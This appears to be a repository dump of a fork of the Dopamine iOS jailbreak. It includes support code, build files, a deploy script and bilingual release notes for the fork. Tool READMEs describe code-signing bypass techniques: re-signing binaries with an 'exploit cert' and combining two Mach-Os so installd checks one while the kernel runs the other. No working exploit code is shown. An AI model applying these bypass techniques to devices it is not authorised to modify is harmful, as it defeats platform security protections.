"WiFiManagerClientSetProperty"); 17 | wifiManager = WiFiManagerClientCreate(kCFAllocatorDefault, 0); 18 | }); 19 | } 20 | 21 | bool wifiIsEnabled(void) 22 | { 23 | loadWifiManager(); 24 | 25 | CFBooleanRef isEnabled = WiFiManagerClientCopyProperty(wifiManager, CFSTR("AllowEnable")); 26 | bool isEnabledBool = false; 27 | if (isEnabled) { 28 | isEnabledBool = CFBooleanGetValue(isEnabled); 29 | CFRelease(isEnabled); 30 | } 31 | return isEnabledBool; 32 | } 33 | 34 | void setWifiEnabled(bool enabled) 35 | { 36 | loadWifiManager(); 37 | 38 | WiFiManagerClientSetProperty(wifiManager, CFSTR("AllowEnable"), enabled ? kCFBooleanTrue : kCFBooleanFalse); 39 | } -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/xpc/XPC.apinotes: -------------------------------------------------------------------------------- 1 | Name: XPC 2 | Functions: 3 | # xpc_object 4 | - Name: xpc_retain 5 | Availability: nonswift 6 | - Name: xpc_release 7 | Availability: nonswift 8 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/xpc/debug.h: -------------------------------------------------------------------------------- 1 | #ifndef __XPC_DEBUG_H__ 2 | #define __XPC_DEBUG_H__ 3 | 4 | /*! 5 | * @function xpc_debugger_api_misuse_info 6 | * Returns a pointer to a string describing the reason XPC aborted the calling 7 | * process. On OS X, this will be the same string present in the "Application 8 | * Specific Information" section of the crash report. 9 | * 10 | * @result 11 | * A pointer to the human-readable string describing the reason the caller was 12 | * aborted. If XPC was not responsible for the program's termination, NULL will 13 | * be returned. 14 | * 15 | * @discussion 16 | * This function is only callable from within a debugger. It is not meant to be 17 | * called by the program directly. 18 | */ 19 | XPC_DEBUGGER_EXCL 20 | const char * 21 | xpc_debugger_api_misuse_info(void); 22 | 23 | #endif // __XPC_DEBUG_H__ 24 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/xpc/endpoint.h: -------------------------------------------------------------------------------- 1 | #ifndef __XPC_ENDPOINT_H__ 2 | #define __XPC_ENDPOINT_H__ 3 | 4 | /*! 5 | * @function xpc_endpoint_create 6 | * Creates a new endpoint from a connection that is suitable for embedding into 7 | * messages. 8 | * 9 | * @param connection 10 | * Only connections obtained through calls to xpc_connection_create*() may be 11 | * given to this API. Passing any other type of connection is not supported and 12 | * will result in undefined behavior. 13 | * 14 | * @result 15 | * A new endpoint object. 16 | */ 17 | __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) 18 | XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT XPC_NONNULL1 19 | xpc_endpoint_t _Nonnull 20 | xpc_endpoint_create(xpc_connection_t _Nonnull connection); 21 | 22 | #endif // __XPC_ENDPOINT_H__ 23 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/xpc/module.modulemap: -------------------------------------------------------------------------------- 1 | module XPC [system] [extern_c] { 2 | header "xpc.h" 3 | header "availability.h" 4 | header "base.h" 5 | header "activity.h" 6 | header "connection.h" 7 | header "debug.h" 8 | header "endpoint.h" 9 | export * 10 | } 11 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/Fugu15KernelExploit/Logger.swift: -------------------------------------------------------------------------------- 1 | // 2 | // Logger.swift 3 | // kexploitd 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2021/2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | import Foundation 10 | 11 | class Logger { 12 | static var logFileHandle: FileHandle? 13 | 14 | static func print(_ s: String) { 15 | NSLog("%@", s) 16 | 17 | if logFileHandle != nil { 18 | try? logFileHandle.unsafelyUnwrapped.write(contentsOf: (s + "\n").data(using: .utf8) ?? Data()) 19 | } 20 | } 21 | 22 | static func fmt(_ s: String, _ args: CVarArg...) { 23 | print(String(format: s, arguments: args)) 24 | } 25 | 26 | static func status(_ s: String) { 27 | print("Status: \(s)") 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /Packages/ProcessCommunication/.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | /.build 3 | /Packages 4 | /*.xcodeproj 5 | xcuserdata/ 6 | DerivedData/ 7 | .swiftpm/xcode/package.xcworkspace/contents.xcworkspacedata 8 | -------------------------------------------------------------------------------- /Packages/ProcessCommunication/Package.swift: -------------------------------------------------------------------------------- 1 | // swift-tools-version:5.4 2 | // The swift-tools-version declares the minimum version of Swift required to build this package. 3 | 4 | import PackageDescription 5 | 6 | let package = Package( 7 | name: "ProcessCommunication", 8 | platforms: [ 9 | .iOS(.v14), 10 | .macOS(.v11) 11 | ], 12 | products: [ 13 | // Products define the executables and libraries a package produces, and make them visible to other packages. 14 | .library( 15 | name: "ProcessCommunication", 16 | targets: ["ProcessCommunication"]) 17 | ], 18 | targets: [ 19 | // Targets are the basic building blocks of a package. A target can define a module or a test suite. 20 | // Targets can depend on other targets in this package, and on products in packages this package depends on. 21 | .target( 22 | name: "ProcessCommunication", 23 | dependencies: []), 24 | ] 25 | ) 26 | -------------------------------------------------------------------------------- /Packages/ProcessCommunication/README.md: -------------------------------------------------------------------------------- 1 | # ProcessCommunication 2 | 3 | Simple process communication library. 4 | -------------------------------------------------------------------------------- /Packages/ProcessCommunication/Sources/ProcessCommunication/ProcessCommunication.swift: -------------------------------------------------------------------------------- 1 | // 2 | // ProcessCommunication.swift 3 | // ProcessCommunication 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2021/2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | import Foundation 10 | 11 | public class ProcessCommunication { 12 | public let read: FileHandle 13 | public let write: FileHandle 14 | 15 | public init(read: FileHandle, write: FileHandle) { 16 | self.read = read 17 | self.write = write 18 | } 19 | 20 | public func receiveCommand() -> [String]? { 21 | var result: [String] = [] 22 | var buf = Data() 23 | while true { 24 | do { 25 | let data = try read.read(upToCount: 1) 26 | if data == nil || data?.count == 0 { 27 | return nil 28 | } 29 | 30 | if data.unsafelyUnwrapped[0] == 0 { 31 | result.append(String(data: buf, encoding: .utf8) ?? "") 32 | return result 33 | } else if data.unsafelyUnwrapped[0] == 1 { 34 | result.append(String(data: buf, encoding: .utf8) ?? "") 35 | buf = Data() 36 | } else { 37 | buf += data.unsafelyUnwrapped 38 | } 39 | } catch _ { 40 | return nil 41 | } 42 | } 43 | } 44 | 45 | @discardableResult 46 | public func sendCommand(_ args: [String]) -> Bool { 47 | do { 48 | var iter = args.makeIterator() 49 | var cur = iter.next() 50 | while cur != nil { 51 | try write.write(contentsOf: cur.unsafelyUnwrapped.data(using: .utf8) ?? Data()) 52 | 53 | cur = iter.next() 54 | if cur != nil { 55 | try write.write(contentsOf: Data(repeating: 1, count: 1)) 56 | } else { 57 | try write.write(contentsOf: Data(repeating: 0, count: 1)) 58 | } 59 | } 60 | 61 | return true 62 | } catch _ { 63 | return false 64 | } 65 | } 66 | 67 | @discardableResult 68 | public func sendCommand(_ args: String...) -> Bool { 69 | sendCommand(args) 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | # Dopamine 4 | 5 | Rootless arm64e jailbreak for iOS 15.0 - 15.4.1. More details will follow here soon. 6 | 7 | Official website / download: https://ellekit.space/dopamine/ 8 | -------------------------------------------------------------------------------- /Tools/Exe2Driver/.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | /.build 3 | /Packages 4 | /*.xcodeproj 5 | xcuserdata/ 6 | DerivedData/ 7 | .swiftpm/xcode/package.xcworkspace/contents.xcworkspacedata 8 | -------------------------------------------------------------------------------- /Tools/Exe2Driver/Exe2Driver: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Tools/Exe2Driver/Exe2Driver -------------------------------------------------------------------------------- /Tools/Exe2Driver/Makefile: -------------------------------------------------------------------------------- 1 | TARGET=Exe2Driver 2 | CONFIG=release 3 | 4 | include ../Makefile.inc 5 | -------------------------------------------------------------------------------- /Tools/Exe2Driver/Package.resolved: -------------------------------------------------------------------------------- 1 | { 2 | "object": { 3 | "pins": [ 4 | { 5 | "package": "SwiftMachO", 6 | "repositoryURL": "https://github.com/pinauten/SwiftMachO", 7 | "state": { 8 | "branch": "master", 9 | "revision": "d433b349d7e69bb8fd5d18ea5cdbcd8b731ddf55", 10 | "version": null 11 | } 12 | }, 13 | { 14 | "package": "SwiftUtils", 15 | "repositoryURL": "https://github.com/pinauten/SwiftUtils", 16 | "state": { 17 | "branch": "master", 18 | "revision": "1d37faabb4c58b3152394c9b6e1c1a68507646b9", 19 | "version": null 20 | } 21 | } 22 | ] 23 | }, 24 | "version": 1 25 | } 26 | -------------------------------------------------------------------------------- /Tools/Exe2Driver/Package.swift: -------------------------------------------------------------------------------- 1 | // swift-tools-version:5.3 2 | // The swift-tools-version declares the minimum version of Swift required to build this package. 3 | 4 | import PackageDescription 5 | 6 | let package = Package( 7 | name: "Exe2Driver", 8 | platforms: [ 9 | .macOS(.v11) 10 | ], 11 | products: [ 12 | // Products define the executables and libraries a package produces, and make them visible to other packages. 13 | .executable( 14 | name: "Exe2Driver", 15 | targets: ["Exe2Driver"]), 16 | ], 17 | dependencies: [ 18 | // Dependencies declare other packages that this package depends on. 19 | .package(name: "SwiftUtils", url: "https://github.com/pinauten/SwiftUtils", .branch("master")), 20 | .package(name: "SwiftMachO", url: "https://github.com/pinauten/SwiftMachO", .branch("master")) 21 | ], 22 | targets: [ 23 | // Targets are the basic building blocks of a package. A target can define a module or a test suite. 24 | // Targets can depend on other targets in this package, and on products in packages this package depends on. 25 | .target( 26 | name: "Exe2Driver", 27 | dependencies: ["SwiftUtils", "SwiftMachO"]) 28 | ] 29 | ) 30 | -------------------------------------------------------------------------------- /Tools/Exe2Driver/README.md: -------------------------------------------------------------------------------- 1 | # Exe2Driver 2 | 3 | Exe2Driver can be used to convert a regular executable into a DriverKit driver which can then be launched using SpawnDrv/kexploitd. 4 | -------------------------------------------------------------------------------- /Tools/Makefile: -------------------------------------------------------------------------------- 1 | TARGETS=fastPathSign BuildVFS Exe2Driver installHaxx 2 | TARGETS_CLEAN=$(addsuffix _clean, $(TARGETS)) 3 | TARGETS_BUILD_CLEAN=$(addsuffix _build_clean, $(TARGETS)) 4 | 5 | all: $(TARGETS) 6 | clean: $(TARGETS_CLEAN) 7 | build_clean: $(TARGETS_BUILD_CLEAN) 8 | 9 | .PHONY: all clean build_clean 10 | 11 | $(TARGETS): FORCE 12 | @echo make -C $@ 13 | @$(MAKE) -C $@ 14 | 15 | $(TARGETS_CLEAN): FORCE 16 | @echo make -C $(@:_clean=) clean 17 | @$(MAKE) -C $(@:_clean=) clean 18 | 19 | $(TARGETS_BUILD_CLEAN): FORCE 20 | @echo make -C $(@:_build_clean=) build_clean 21 | @$(MAKE) -C $(@:_build_clean=) build_clean 22 | 23 | FORCE: ; 24 | -------------------------------------------------------------------------------- /Tools/Makefile.inc: -------------------------------------------------------------------------------- 1 | SWIFT_BUILD_ARGS=-c $(CONFIG) 2 | 3 | SWIFT_BUILD_ARGS_X86_64=$(SWIFT_BUILD_ARGS) -Xswiftc -target -Xswiftc x86_64-apple-macos12.0 4 | SWIFT_BUILD_ARGS_ARM64=$(SWIFT_BUILD_ARGS) -Xswiftc -target -Xswiftc arm64-apple-macos12.0 5 | 6 | all: $(TARGET) 7 | 8 | build_clean: 9 | rm -rf .build_x86_64 .build_arm64 10 | 11 | clean: build_clean 12 | rm -f $(TARGET) 13 | 14 | .PHONY: all build_clean clean 15 | 16 | .build_x86_64/$(CONFIG)/$(TARGET): FORCE 17 | swift build --build-path .build_x86_64 $(SWIFT_BUILD_ARGS_X86_64) 18 | 19 | .build_arm64/$(CONFIG)/$(TARGET): FORCE 20 | swift build --build-path .build_arm64 $(SWIFT_BUILD_ARGS_ARM64) 21 | 22 | $(TARGET): .build_x86_64/$(CONFIG)/$(TARGET) .build_arm64/$(CONFIG)/$(TARGET) 23 | lipo -create .build_x86_64/$(CONFIG)/$(TARGET) .build_arm64/$(CONFIG)/$(TARGET) -output $(TARGET) 24 | 25 | FORCE: ; 26 | -------------------------------------------------------------------------------- /Tools/fastPathSign/.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | /.build 3 | /Packages 4 | /*.xcodeproj 5 | xcuserdata/ 6 | DerivedData/ 7 | .swiftpm/xcode/package.xcworkspace/contents.xcworkspacedata 8 | -------------------------------------------------------------------------------- /Tools/fastPathSign/Makefile: -------------------------------------------------------------------------------- 1 | TARGET=fastPathSign 2 | CONFIG=release 3 | 4 | include ../Makefile.inc 5 | -------------------------------------------------------------------------------- /Tools/fastPathSign/Package.swift: -------------------------------------------------------------------------------- 1 | // swift-tools-version:5.4 2 | // The swift-tools-version declares the minimum version of Swift required to build this package. 3 | 4 | import PackageDescription 5 | 6 | let package = Package( 7 | name: "fastPathSign", 8 | platforms: [ 9 | .macOS(.v11) 10 | ], 11 | products: [ 12 | // Products define the executables and libraries a package produces, and make them visible to other packages. 13 | .executable( 14 | name: "fastPathSign", 15 | targets: ["fastPathSign"]), 16 | ], 17 | targets: [ 18 | // Targets are the basic building blocks of a package. A target can define a module or a test suite. 19 | // Targets can depend on other targets in this package, and on products in packages this package depends on. 20 | .systemLibrary(name: "Security_Codesign"), 21 | .executableTarget( 22 | name: "fastPathSign", 23 | dependencies: ["Security_Codesign"]) 24 | ] 25 | ) 26 | -------------------------------------------------------------------------------- /Tools/fastPathSign/README.md: -------------------------------------------------------------------------------- 1 | # fastPathSign 2 | 3 | fastPathSign is a tool to re-sign MachO's with the fastPath exploit cert. 4 | 5 | # Prerequisites 6 | 7 | Make sure you imported the fastPath exploit certificate into your Keychain (Exploits/fastPath/arm.pfx, password: "password"). 8 | The certificate must be named "Pinauten PWN Cert". 9 | 10 | # Usage 11 | 12 | First ad-hoc sign the MachO, including the entitlements you need. 13 | Then run `fastPathSign ` to re-sign your MachO. This will keep the entitlements, identifier, etc. 14 | -------------------------------------------------------------------------------- /Tools/fastPathSign/Sources/Security_Codesign/module.modulemap: -------------------------------------------------------------------------------- 1 | module Security_Codesign [system] { 2 | header "SecCodeSigner.h" 3 | } 4 | -------------------------------------------------------------------------------- /Tools/fastPathSign/fastPathSign: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Tools/fastPathSign/fastPathSign -------------------------------------------------------------------------------- /Tools/installHaxx/.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | /.build 3 | /Packages 4 | /*.xcodeproj 5 | xcuserdata/ 6 | DerivedData/ 7 | .swiftpm/xcode/package.xcworkspace/contents.xcworkspacedata 8 | -------------------------------------------------------------------------------- /Tools/installHaxx/Makefile: -------------------------------------------------------------------------------- 1 | TARGET=installHaxx 2 | CONFIG=release 3 | 4 | include ../Makefile.inc 5 | -------------------------------------------------------------------------------- /Tools/installHaxx/Package.resolved: -------------------------------------------------------------------------------- 1 | { 2 | "object": { 3 | "pins": [ 4 | { 5 | "package": "SwiftMachO", 6 | "repositoryURL": "https://github.com/pinauten/SwiftMachO", 7 | "state": { 8 | "branch": "master", 9 | "revision": "d433b349d7e69bb8fd5d18ea5cdbcd8b731ddf55", 10 | "version": null 11 | } 12 | }, 13 | { 14 | "package": "SwiftUtils", 15 | "repositoryURL": "https://github.com/pinauten/SwiftUtils", 16 | "state": { 17 | "branch": "master", 18 | "revision": "1d37faabb4c58b3152394c9b6e1c1a68507646b9", 19 | "version": null 20 | } 21 | } 22 | ] 23 | }, 24 | "version": 1 25 | } 26 | -------------------------------------------------------------------------------- /Tools/installHaxx/Package.swift: -------------------------------------------------------------------------------- 1 | // swift-tools-version:5.4 2 | // The swift-tools-version declares the minimum version of Swift required to build this package. 3 | 4 | import PackageDescription 5 | 6 | let package = Package( 7 | name: "installHaxx", 8 | platforms: [ 9 | .iOS(.v14), 10 | .macOS(.v11) 11 | ], 12 | products: [ 13 | // Products define the executables and libraries a package produces, and make them visible to other packages. 14 | .executable( 15 | name: "installHaxx", 16 | targets: ["installHaxx"]), 17 | ], 18 | dependencies: [ 19 | // Dependencies declare other packages that this package depends on. 20 | .package(name: "SwiftUtils", url: "https://github.com/pinauten/SwiftUtils", .branch("master")), 21 | .package(name: "SwiftMachO", url: "https://github.com/pinauten/SwiftMachO", .branch("master")) 22 | ], 23 | targets: [ 24 | // Targets are the basic building blocks of a package. A target can define a module or a test suite. 25 | // Targets can depend on other targets in this package, and on products in packages this package depends on. 26 | .executableTarget( 27 | name: "installHaxx", 28 | dependencies: ["SwiftUtils", "SwiftMachO"]), 29 | ] 30 | ) 31 | -------------------------------------------------------------------------------- /Tools/installHaxx/README.md: -------------------------------------------------------------------------------- 1 | # installHaxx 2 | 3 | Tool to combine two MachO's. When installing an iOS App containing an executable created by this tool, installd will validate the first MachO while the kernel will execute the second one. 4 | -------------------------------------------------------------------------------- /Tools/installHaxx/installHaxx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Tools/installHaxx/installHaxx -------------------------------------------------------------------------------- /jbupdate.sh: -------------------------------------------------------------------------------- 1 | DEVICE=iPhone13Pro.Remote 2 | 3 | ssh $DEVICE "rm -rf /var/mobile/Documents/Dopamine.tipa" 4 | scp ./Dopamine/Dopamine.tipa $DEVICE:/var/mobile/Documents/Dopamine.tipa 5 | ssh $DEVICE "/var/jb/basebin/jbctl update tipa /var/mobile/Documents/Dopamine.tipa" -------------------------------------------------------------------------------- /release.md: -------------------------------------------------------------------------------- 1 | ## 关于本次更新 2 | 3 | 这本质上是一个自用版本,发布的意思是「分享」。 4 | 5 | ### 1.1.10 - 20231030_234232 6 | 7 | 1. 更新上游代码至 `opa334/Dopamine:95f3ba0`。 8 | 2. 新功能开发中。 9 | 10 | ## 修改版的主要功能 11 | 12 | 1. 提供汉化(包括中国大陆、中国香港、中国台湾)。对,汉化作者是我(自豪)。 13 | 2. 可与官方版本共存。 14 | 3. 支持应用内更新越狱包。 15 | 4. 支持目录映射,并支持越狱后新增目录映射(而无需重启越狱;位于越狱后的设置中)。 16 | 5. 允许用户在越狱成功后点按「用户空间重启以完成越狱」,而不是自动重启。 17 | 6. 额外提供「软重启」、「重启」功能按钮。 18 | 7. 提供重建越狱引导环境的功能(位于设置中)。 19 | 8. 提供「屏蔽更新」的功能,以屏蔽 Dopamine 在启动时检查更新。当然,你可能因此错过最新更新;虽然这通常不是什么大问题。 20 | 9. 提供「桥接心浪」的功能,以便以 XinA 的模式安装有根插件。 21 | 10. 在首次越狱和重建越狱时,自动安装正确版本的 ElleKit 和 PreferenceLoader。 22 | 11. 首页加入编译时间及系统启动时间,关于页加入编译版本。 23 | 24 | ------ 25 | 26 | ## About This Update 27 | 28 | This modification is disigned to be used only by me myself. 29 | 30 | ### 1.1.10 - 20231030_234232 31 | 32 | 1. Update upstream to `opa334/Dopamine:95f3ba0`. 33 | 2. New Feature: WIP... 34 | 35 | ## About this Mod 36 | 37 | 1. Offers Chinese translation (Mainland China, Hongkong of China, Taiwan of China). 38 | 2. Be able to stay with the official version. 39 | 3. Offers the ability to OTA update. 40 | 4. Support path bind & mount. Also support hot bind & mount (do not need to reboot and re-jailbreak; find it at settings page after jailbroken). 41 | 5. Allow users to reboot userspace by tap button, rather than slightly reboot. 42 | 6. Offers ldrestart and reboot buttons. 43 | 7. In settings, users could enable "rebuild environment". 44 | 8. Provide a "block updates" feature to block Dopamine from checking for updates on startup. However, you may miss out on the latest updates as a result, although this is generally not a significant issue. 45 | 9. Provide the "Bridge to XinA" feature to facilitate the installation of rooted plugins using the XinA mode. 46 | 10. Installing the correct ElleKit and PreferenceLoader when Jailbreak for the first time. 47 | 11. Add compile time and system uptime on the first page, and add compile version in about page. 48 | 49 | ------ 50 | --------------------------------------------------------------------------------